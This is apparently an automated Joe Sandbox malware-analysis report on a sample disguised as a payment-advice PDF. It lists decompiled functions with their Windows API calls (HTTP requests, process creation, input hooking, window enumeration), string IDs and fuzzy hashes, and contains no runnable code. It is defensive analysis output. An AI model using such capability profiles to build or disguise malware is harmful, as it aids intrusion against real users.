                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008B5862
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008B5878
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008B58ED
                                                              • WSACleanup.WSOCK32 ref: 008B58F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 09847c16cc3c410261f049e5840e2af1479b5c0a3f2cc7157b08d5ac883f064f
                                                              • Instruction ID: 6c5c48e7de36cd59cdda97a99d078abb859b97991e741df25c312f82ad3d32ee
                                                              • Opcode Fuzzy Hash: 09847c16cc3c410261f049e5840e2af1479b5c0a3f2cc7157b08d5ac883f064f
                                                              • Instruction Fuzzy Hash: 84514D316046049FDB21EF29DC45B6A7BE4FF48724F04452AF996DB3A2DB70E900DB52
                                                              Function 008AB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 008AB4D0
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 008AB546
                                                              • GetLastError.KERNEL32 ref: 008AB550
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 008AB5BD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: a160c2c62ea5d84ec032e6da1a89886d41ad1433ee04bdf324abb06b98f7f191
                                                              • Instruction ID: 5942aefb6944d9a7748622c2987b5a6d2e7c5eae72f023126d90173e65f82917
                                                              • Opcode Fuzzy Hash: a160c2c62ea5d84ec032e6da1a89886d41ad1433ee04bdf324abb06b98f7f191
                                                              • Instruction Fuzzy Hash: D8318035E00209DFEB10EBA8C845EBE7BB4FF4A314F144126E615D7692DB71DA41CB51
                                                              Function 00898F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00899014
                                                              • GetDlgCtrlID.USER32 ref: 0089901F
                                                              • GetParent.USER32 ref: 0089903B
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0089903E
                                                              • GetDlgCtrlID.USER32(?), ref: 00899047
                                                              • GetParent.USER32(?), ref: 00899063
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00899066
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: 3ddc11d427f45fbc03c538fc4c8ddd2d178e95efa72fffb70ee5f06c104d07f4
                                                              • Instruction ID: ac36574212643422903f3ebc67abbf36448945dff290c0c5a4536f28f6e6674a
                                                              • Opcode Fuzzy Hash: 3ddc11d427f45fbc03c538fc4c8ddd2d178e95efa72fffb70ee5f06c104d07f4
                                                              • Instruction Fuzzy Hash: E721B270A00108BBDF04ABA4CC85EFEBB75FF59310F140119FA61D72A2EB755815DB21
                                                              Function 0089907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008990FD
                                                              • GetDlgCtrlID.USER32 ref: 00899108
                                                              • GetParent.USER32 ref: 00899124
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00899127
                                                              • GetDlgCtrlID.USER32(?), ref: 00899130
                                                              • GetParent.USER32(?), ref: 0089914C
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0089914F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: 92572c6039583fcf34ff427ef62345f330ccd105297a590dfcb7c57dbfd60063
                                                              • Instruction ID: 358a7e8c353eec3df9dcd61ce5494add8b41be2bb76efd75db9f21020ee57f63
                                                              • Opcode Fuzzy Hash: 92572c6039583fcf34ff427ef62345f330ccd105297a590dfcb7c57dbfd60063
                                                              • Instruction Fuzzy Hash: 9921DA74A00108BBEF05ABA8CC85EFEBB75FF58300F144019F661D72A2EB795415DB21
                                                              Function 00899163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32 ref: 0089916F
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00899184
                                                              • _wcscmp.LIBCMT ref: 00899196
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00899211
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: 3553d3a8e55ce366cfd0b67f2307fb747cf0eb0157adbd1f44a32d87c47b8e0b
                                                              • Instruction ID: 2da9263fbb6228f1ddea6d5fffb6e8201b331238fdf2b3612775835e40f465b4
                                                              • Opcode Fuzzy Hash: 3553d3a8e55ce366cfd0b67f2307fb747cf0eb0157adbd1f44a32d87c47b8e0b
                                                              • Instruction Fuzzy Hash: BB113D3A34830BB5FE10377CDC06DB73B9CFB10320B24006AFA20E44D2FEA658115550
                                                              Function 008B88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 008B88D7
                                                              • CoInitialize.OLE32(00000000), ref: 008B8904
                                                              • CoUninitialize.OLE32 ref: 008B890E
                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 008B8A0E
                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 008B8B3B
                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,008D2C0C), ref: 008B8B6F
                                                              • CoGetObject.OLE32(?,00000000,008D2C0C,?), ref: 008B8B92
                                                              • SetErrorMode.KERNEL32(00000000), ref: 008B8BA5
                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008B8C25
                                                              • VariantClear.OLEAUT32(?), ref: 008B8C35
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                              • String ID:
                                                              • API String ID: 2395222682-0
                                                              • Opcode ID: 8a8072392dfd7462ee2fc084bdb6c134883e500a6a918d4a113f3bfb5ad19cf8
                                                              • Instruction ID: 3e881c7db9d3c348c79573a21d351f259af77d32f2e6b32aa1692b56b86875b7
                                                              • Opcode Fuzzy Hash: 8a8072392dfd7462ee2fc084bdb6c134883e500a6a918d4a113f3bfb5ad19cf8
                                                              • Instruction Fuzzy Hash: EAC1E1B1608205EFD700DF68C88496ABBE9FB89758F00492DF589DB261DB71ED05CB52
                                                              Function 008A7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 008A7A6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 80569a18da363ff111b243feb80fb957483f07cde70ed7b1b2fc7326a927457b
                                                              • Instruction ID: b87b0857b96d49ce007c7949c6a406d4927e6cba24f9afe65ff543bc09921924
                                                              • Opcode Fuzzy Hash: 80569a18da363ff111b243feb80fb957483f07cde70ed7b1b2fc7326a927457b
                                                              • Instruction Fuzzy Hash: 74B19F7190421A9FEB10DFA8CC84BBEB7B5FF0A325F244429E641E7641D734A941EBA1
                                                              Function 008A11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 008A11F0
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A1204
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 008A120B
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008A0268,?,00000001), ref: 008A121A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 008A122C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008A0268,?,00000001), ref: 008A1245
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008A0268,?,00000001), ref: 008A1257
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A129C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A12B1
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,008A0268,?,00000001), ref: 008A12BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: b0c9cb75482bd3b288c62ebe664610dfcda2d67caaa56d6674019370f99b6379
                                                              • Instruction ID: a9b61c57bed77438993c14937ce25db0e2b1abc824c7ded9651be8da1b32f391
                                                              • Opcode Fuzzy Hash: b0c9cb75482bd3b288c62ebe664610dfcda2d67caaa56d6674019370f99b6379
                                                              • Instruction Fuzzy Hash: 1931A975618204AFFF20DF54EC88F6977AAFB66351F104125FA01C76A1D7B4DD409B60
                                                              Function 0084FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0084FAA6
                                                              • OleUninitialize.OLE32(?,00000000), ref: 0084FB45
                                                              • UnregisterHotKey.USER32(?), ref: 0084FC9C
                                                              • DestroyWindow.USER32(?), ref: 008845D6
                                                              • FreeLibrary.KERNEL32(?), ref: 0088463B
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00884668
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: bb6e497852c5bc52b473f895236a58244f94e1b63af271475891f9ef89c65e9d
                                                              • Instruction ID: 8c4267bd2f2961ec568ef8a130687830153884c88fb1dc55d51266704fca678f
                                                              • Opcode Fuzzy Hash: bb6e497852c5bc52b473f895236a58244f94e1b63af271475891f9ef89c65e9d
                                                              • Instruction Fuzzy Hash: A1A19E3130122ACFDB29EF18C994A29F761FF15714F1442ADE90AEB262DB30AC16CF51
                                                              Function 0089A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0089A439), ref: 0089A377
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: b220d1cb7cc111b0677288a3836d7311bf7af841d9380e06a2108f038414c35d
                                                              • Instruction ID: c94bfa9cacb22729b8d40cc96fd86dc1a655cfe56587d00abf662cfd13ec9296
                                                              • Opcode Fuzzy Hash: b220d1cb7cc111b0677288a3836d7311bf7af841d9380e06a2108f038414c35d
                                                              • Instruction Fuzzy Hash: 4E91703060060AAADF0CEFA4C446BEEFB75FF04304F588119E95AE7251DB316999DBD2
                                                              Function 00842E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00842EAE
                                                                • Part of subcall function 00841DB3: GetClientRect.USER32(?,?), ref: 00841DDC
                                                                • Part of subcall function 00841DB3: GetWindowRect.USER32(?,?), ref: 00841E1D
                                                                • Part of subcall function 00841DB3: ScreenToClient.USER32(?,?), ref: 00841E45
                                                              • GetDC.USER32 ref: 0087CD32
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0087CD45
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0087CD53
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0087CD68
                                                              • ReleaseDC.USER32(?,00000000), ref: 0087CD70
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0087CDFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: 86654effc4a114abd18c53308d7afb4a8ba0d3b2dc6cf500847a71db4081af53
                                                              • Instruction ID: 00c8db0cbb7b4730b5edaf5ddb467c01f1074b7a6d40918b8aa340f056ae68bd
                                                              • Opcode Fuzzy Hash: 86654effc4a114abd18c53308d7afb4a8ba0d3b2dc6cf500847a71db4081af53
                                                              • Instruction Fuzzy Hash: 61718E31504209DFCF218F64C884AAA7FB5FF48324F14826AFD59DB2AAD731C881DB60
                                                              Function 008B1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008B1A50
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008B1A7C
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 008B1ABE
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008B1AD3
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B1AE0
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008B1B10
                                                              • InternetCloseHandle.WININET(00000000), ref: 008B1B57
                                                                • Part of subcall function 008B2483: GetLastError.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B2498
                                                                • Part of subcall function 008B2483: SetEvent.KERNEL32(?,?,008B1817,00000000,00000000,00000001), ref: 008B24AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 2603140658-3916222277
                                                              • Opcode ID: 9c5b82915a38610336b8007ea10dea2d936df3993a50372c71d59e0ef2ea3bcf
                                                              • Instruction ID: 93becb24150410d38461b6cd0e0e898f7822778cf46dbc1bd15abecdc1b17940
                                                              • Opcode Fuzzy Hash: 9c5b82915a38610336b8007ea10dea2d936df3993a50372c71d59e0ef2ea3bcf
                                                              • Instruction Fuzzy Hash: F0414CB1501219BFEF119F54CC99FFA7BADFB08354F00412AFA05DA241E770AE449BA5
                                                              Function 008B8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,008CF910), ref: 008B8D28
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,008CF910), ref: 008B8D5C
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008B8ED6
                                                              • SysFreeString.OLEAUT32(?), ref: 008B8F00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: e7adf88b027981b552db6c9b5ca01417bf50ec8e21b377a91492656acf02bff4
                                                              • Instruction ID: 510ddd0a882418b066fa3db011ad0612e786a61ec3e4483e769c0eb1234b3a6b
                                                              • Opcode Fuzzy Hash: e7adf88b027981b552db6c9b5ca01417bf50ec8e21b377a91492656acf02bff4
                                                              • Instruction Fuzzy Hash: 27F1F471A00119EFDB14EF94C884EEEB7B9FF45314F148498E905EB251DB31AE46CB61
                                                              Function 008BF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008BF6B5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008BF848
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008BF86C
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008BF8AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008BF8CE
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 008BFA4A
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008BFA7C
                                                              • CloseHandle.KERNEL32(?), ref: 008BFAAB
                                                              • CloseHandle.KERNEL32(?), ref: 008BFB22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: 108874b76b75f37d544f8c1464cc27fbd6b05d0635afea9cafbda0ae8fe6eab9
                                                              • Instruction ID: 52d2ddbf6a9e2ba37b0f597d2b4e8fef71dc2a6a1569c7c6233e4af584d03226
                                                              • Opcode Fuzzy Hash: 108874b76b75f37d544f8c1464cc27fbd6b05d0635afea9cafbda0ae8fe6eab9
